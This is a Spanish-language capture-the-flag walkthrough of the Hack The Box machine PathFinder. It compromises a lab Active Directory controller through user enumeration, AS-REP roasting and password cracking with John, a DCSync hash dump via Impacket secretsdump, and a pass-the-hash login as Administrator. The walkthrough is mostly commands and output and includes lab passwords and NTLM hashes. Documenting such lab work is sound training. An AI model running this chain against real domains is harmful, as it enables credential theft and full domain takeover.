PathFinder
Difficulty : Very Easy
Operating System : Windows
Rating : 4.7
Author : egotisticalSW
Description
Esta maquina es la quinta del set "Starting Point". Para realizar la intrusion utilizaremos las credenciales que obtuvimos en la maquina anterior y nos permitiran enumerar el Domain Controller correctamente. Obtendremos un usuario con privilegios y de ahi escalaremos a Administrator.
Enumeration
Para la enumeracion basica vamos a utilizar una tool que he desarrollado especificamente para trabajar con maquinas en la plataforma hackthebox. Esta herramienta crea la carpeta de trabajo, realiza un escaneo basico con nmap y si encuentra un servicio web le lanza una enumeracion basica.
Descarga: HTBenum
Nmap
Nmap scan report for pathfinder.htb (10.10.10.30)
Host is up (0.060s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-06 20:43:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49718/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=8/6%Time=610D3AC1%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h07m44s, deviation: 0s, median: 7h07m44s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-06 22:45:56
|_ start_date: N/A
sandra
Password1234!
Vamos utilizar estas credenciales a traves de la utilidad rpcenum que al fin y al cabo es un wrapper de rpcclient. Por defecto rpcenum viene diseñado para hacer conexion NULL por lo que he tenido que editar el script y poner las credenciales que vamos a utilizar.
Descarga: rpcenum-pathfinder.sh
[root@htb pathfinder]# ./rpcenum-pathfinder.sh -e All -i 10.10.10.30
[*] Enumerating Domain Users...
+----------------+
| Users |
+----------------+
| Administrator |
| Guest |
| krbtgt |
| svc_bes |
| sandra |
+----------------+
[*] Listing domain users with description...
+----------------+-----------------------------------------------------------+
| User | Description |
+----------------+-----------------------------------------------------------+
| Administrator | Built-in account for administering the computer/domain |
| Guest | Built-in account for guest access to the computer/domain |
| krbtgt | Key Distribution Center Service Account |
+----------------+-----------------------------------------------------------+
[*] Enumerating Domain Admin Users...
+-------------------+
| DomainAdminUsers |
+-------------------+
| Administrator |
+-------------------+
[*] Enumerating Domain Groups...
+------------------------------------------+-------------------------------------------------------------------------------------------------------------------+
| DomainGroup | Description |
+------------------------------------------+-------------------------------------------------------------------------------------------------------------------+
| Enterprise Read-only Domain Controllers | Members of this group are Read-Only Domain Controllers in the enterprise |
| Domain Admins | Designated administrators of the domain |
| Domain Users | All domain users |
| Domain Guests | All domain guests |
| Domain Computers | All workstations and servers joined to the domain |
| Domain Controllers | All domain controllers in the domain |
| Schema Admins | Designated administrators of the schema |
| Enterprise Admins | Designated administrators of the enterprise |
| Group Policy Creator Owners | Members in this group can modify group policy for the domain |
| Read-only Domain Controllers | Members of this group are Read-Only Domain Controllers in the domain |
| Cloneable Domain Controllers | Members of this group that are domain controllers may be cloned. |
| Protected Users | Members of this group are afforded additional protections against authentication security threats. See http |
| Key Admins | Members of this group can perform administrative actions on key objects within the domain. |
| Enterprise Key Admins | Members of this group can perform administrative actions on key objects within the forest. |
| DnsUpdateProxy | DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers). |
+------------------------------------------+-------------------------------------------------------------------------------------------------------------------+
User Own
Una vez obtenida la informacion a traves de la enumeracion del domain controller, vamos a guardar en un fichero users.txt los nombres de usuario que hemos obtenido
[root@htb pathfinder]# cat users.txt
Administrator
Guest
krbtgt
svc_bes
sandra
Ahora vamos a utilizar la herramienta GetNPUsers.py de la suite Impacket que intentara mostrarnos el Ticket Granting Ticket (TGT) de los usuarios que no requieren preautenticacion kerberos.
[root@htb pathfinder]# GetNPUsers.py -usersfile users.txt megacorp.local/ -no-pass -dc-ip 10.10.10.30
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:0f894a838e6b185da0ad9056d55227ac$f25713089f992c9a151e4096b6cf94e7cf792c18b409a7e69db8deda5b3cc4ee192e11cf4a4f8f2713b9d4f2c0089ee06e79e59e94806787c92971db45949ca46025c060b9a07db73b3e95de66fc66265afbecc513c917a7fc125c2a90597d37114546caac60e059ae6d339b1be6608f3079c11a34e9e6a8041f80d7d4f32ce29a4bb3dfc867c1b936660fc51d81ef609228187bd094f22a577dca6f8d5a504f14263d4e9e337006205374b5e2a025117f4c8c80964dd93c20d18984fc1251987cfff2f699895211198769a89353607cecac83818e8f33b5ae400e3d5298008405a064a8e95c4d124913e8d30e88bb13
[-] User sandra doesn't have UF_DONT_REQUIRE_PREAUTH set
Una vez obtenido el ticket, podemos almacenarlo en un fichero y crackearlo con john the ripper
[root@htb pathfinder]# cat token.txt
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:00c4e7b0ce1ad503425a4b0161021fe5$8d8d475c06d1fb191d431055f3dc5cf63e22ebcbb6cdf4a7cb122e8f16374f221327e13be255eb60df449969b864abf3322c2c69c16738b9cbbd47ff1a67727656d7c7581c0df55280d19d4553c92fe86fb313fd7fb843bd2e7796183d005edf241d9c89917239f29834ce6595f7359911e427b21a16154e552536dd1e1c66280e240ee9ea6d9d7ca5c462c5abf9a57ca46db4af7c4a43b4261f5560257c58e6e1cc51ebe742dbeb903a7379ae7e2db8882018922feed8ae18ee799621de5f64bf0c10284e66a5017a2f6a13b0ff132e99e715ecded126bdbd6347dd93a0cfff96a586fb5682ce5e04b2960b67401854
[root@htb pathfinder]# john token.txt --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19 ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:12 DONE (2021-08-07 15:26) 0.07930g/s 840841p/s 840841c/s 840841C/s Sherbear27..Sheepy01
Use the "--show" option to display all of the cracked passwords reliably
Session completed
svc_besSheffield19
Con el nuevo usuario obtenido y su contraseña vamos a conectar a la maquina a traves de Evil-WinRM
[root@htb pathfinder]# evil-winrm -i 10.10.10.30 -u svc_bes -p 'Sheffield19'
Evil-WinRM shell v3.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_bes\Documents> whoami
megacorp\svc_bes
*Evil-WinRM* PS C:\Users\svc_bes\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_bes> cd Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> dir
Directory: C:\Users\svc_bes\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/25/2020 2:35 PM 32 user.txt
*Evil-WinRM* PS C:\Users\svc_bes\Desktop>
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
================ ==============================================
megacorp\svc_bes S-1-5-21-1035856440-4137329016-3276773158-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Root Own
El usuario anterior tiene permisos para ver los hashes de otros usuarios.. por lo que vamos a lanzar impacket-secretsdump para intentar obtener un hash de superadmin..
[root@htb pathfinder]# impacket-secretsdump -just-dc-ntlm MEGACORP.local/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
Por ultimo, volveremos a utilizar Evil-WinRM esta vez para hacer pass-the-hash y conectarnos a la cuenta Administrator con el hash obtenido
[root@htb pathfinder]# evil-winrm -i 10.10.10.30 -u Administrator -H 8a4b77d52b1845bfe949ed1b9643bb18
Evil-WinRM shell v3.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megacorp\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/25/2020 2:33 PM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop>